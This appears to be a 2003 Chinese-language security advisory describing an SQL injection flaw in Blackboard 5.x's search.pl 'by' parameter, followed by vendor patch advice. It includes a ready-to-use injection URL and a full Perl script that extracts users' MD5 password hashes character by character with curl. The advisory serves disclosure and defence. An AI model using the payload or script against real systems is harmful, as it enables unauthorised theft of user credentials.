安全研究
安全漏洞
Blackboard教学系统search.pl SQL注入漏洞
发布日期:2003-01-21
更新日期:2003-01-25
受影响系统:
Blackboard Blackboard 5.5.1描述:
Blackboard Blackboard 5.5
Blackboard Blackboard 5.0.2
Blackboard Blackboard 5.0
BUGTRAQ ID: 6655
Blackboard是一款在线提供学术、管理、社区及其他一些教育服务的解决方案。
Blackboard对用户提交的输入请求缺少充分过滤,远程攻击者可以利用这个漏洞未授权查询Blackboard用户目录,获得任意用户MD5加密密码信息等恶意活动。
系统包含的搜索脚本'/bin/common/search.pl'对用户提交的参数缺少正确过滤,攻击者提交恶意SQL命令给'&by'参数,可导致更改原SQL逻辑,获得任意用户MD5加密密码信息或用户目录信息。利用这些信息可以进一步对系统进行攻击。
<*来源:Pedram Amini (pedram.amini@tulane.edu)
链接:http://pedram.redhive.com/advisories/blackboard5.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/bin/common/search.pl?action=RESULTS
&context=USERDIR
&type=SEARCH
&operation=VIEW
&keyword=meow
&keywordraw=
&by=passwd) LIKE '%%' AND U.system_role = 't' AND upper(U.passwd
测试脚本:
#!/usr/bin/perl -w
#
# Blackboard Password Extractor
#
# pedram amini <http://pedram.redhive.com>
#
# - refer to the advisory for usage.
# - requires curl.
# - can be easily further automated.
#
# set these:
$password = "abcd"; # initial "narrow down" password.
$session_id = "\@\@123456abcd...."; # current valid session id.
$host = "blackboard.xxxxx.xxx"; # target blackboard server.
$grep_for = "lastname"; # target we're looking for.
# don't forget to comment out either the working forwards or backwards lines.
@chars = ('0', '1', '2', '3', '4', '5', '6', '7',
'8', '9', 'a', 'b', 'c', 'd', 'e', 'f');
$url = "http://$host/bin/common/search.pl?action=RESULTS&context=USERDIR&type=SEARCH&operation=VIEW&keyword=MEOW&keywordraw=_SENTINAL_&by=passwd";
$url =~ s/&/\\&/g;
for ($keep_looking = 1; $keep_looking != 0; ) {
for ($i = 0; $i <= $#chars; $i++) {
# working forwards:
#$cur_pass = $password . $chars[$i];
# working backwards:
#$cur_pass = $chars[$i] . $password;
$cur_url = $url;
$cur_url =~ s/_SENTINAL_/$cur_pass/;
print "\n --> working ... $chars[$i]";
$return = `curl --cookie session_id=$session_id $cur_url 2> /dev/null | grep -i $grep_for | wc -l`;
$return =~ s/\s//g;
print "\n --> returned ... $return";
if ($return) {
print "\n --> next char found: $chars[$i]";
# working forwards:
#$password .= $chars[$i];
# working backwards:
#$password = $chars[$i] . $password;
$keep_looking = 1;
$i = $#chars;
} else {
$keep_looking = 0;
}
sleep 1;
}
print "\n --> current password ... $password";
}
建议:
厂商补丁:
Blackboard
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Blackboard将在最近推出安全补丁来修补这个漏洞,用户可以联系供应商获得详细信息。
Blackboard产品支持热线:
1-888-788-5264
或者通过WEB站点提交服务请求:
http://company.blackboard.com/
浏览次数:3311
严重程度:28(网友投票)
绿盟科技给您安全的保障